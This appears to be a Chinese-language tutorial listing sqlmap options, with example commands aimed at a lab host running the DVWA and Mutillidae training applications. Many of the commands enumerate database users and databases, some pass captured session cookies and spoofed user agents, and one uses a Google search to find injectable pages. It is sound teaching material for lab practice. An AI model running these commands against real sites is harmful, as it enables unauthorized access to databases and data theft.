1.PNG
Options:
-h或-hh:查看sqlmap的参数信息,双h显示全部
-v:显示详细的信息,有1-6级,默认为1
--version:查看版本信息
--current-db获取当前数据库
Target:
-d:直接连接数据库服务器,作为数据库客户端使用
-u:后面跟URL地址,最好用双引号括起来,一定要存在变量名称
-l:logfile,将Burpsuite或WEbScarab代理记录的log日志文件提交上来
-x:sitemapurl,将站点地图sitemap文件提交上来
-m:将有多个URL的文件提交上来进行扫描
-r:提交HTTP request信息的文件
-g:用Google去搜索
-c:提交配置文件
GET方法:
-p参数只对指定的参数进行注入,在上述命令中指定了对username参数进行注入
-f参数查看指纹信息
--users:查看当前数据库所有用户
--banner:查看数据库版本信息
--dbs:查看目标数据库系统的所有库
--schema:查看元数据库,查看到的信息会很多
-a:all,所有数据都查找
-d参数,直接连接数据库服务器,作为数据库客户端使用而不是通过SQL注入漏洞查询进行,查询速度较快,前提是已知数据库当前的用户名及其密码、IP、端口(3306端口为mysql)和数据库名称(dvwa):sqlmap -d “mysql://user:password@10.10.10.137:3306/dvwa” -f --users
-m参数,将有多个URL的文件提交上来进行扫描:sqlmap -m urllist.txt --users
-g参数,扫描Google搜索结果:sqlmap -g “inurl:\”.php?id=1\””
POST方法:
HTTPS:扫描HTTPS网站时需要添加参数--force-ssl:
sqlmap -u "https://10.10.10.137/a.php?id=1:8843" --force-ssl
扫描配置文件:
sqlmap -c sqlmap.conf
查找sqlmap默认配置文件的路径:
dpkg -L sqlmap | grep sqlmap.conf
Request:
--data数据段:将URL中的参数部分放到后面:
sqlmap -u "http://10.10.10.137/mutillidae/index.php?page=login.php" --data="username=1&password=2&login-php-submit-button=Login" -f
--param-del:变量分隔符
默认情况下参数变量的分隔符为&,若为其他符号时要使用变量分隔符。
sqlmap -u "http://10.10.10.137/mutillidae/index.php?page=login.php" --data="username=1;password=2;login-php-submit-button=Login" --param-del=";" -f
--cookie:Cookie头
因为DVWA进入之前需要登录,即要有cookie,所以在对DVWA进行sqlmap查询时需要用到cookie参数。同样,cookie值用Burpsuite可以很方便地查看。
sqlmap -u "http://10.10.10.137/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=7a89438737dbd6b89c3b11b1472045c0" -f
--random-agent:保存在/usr/share/sqlmap/txt/user-agents.txt
sqlmap -u "http://10.10.10.137/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=7a89438737dbd6b89c3b11b1472045c0" --random-agent --users
网友评论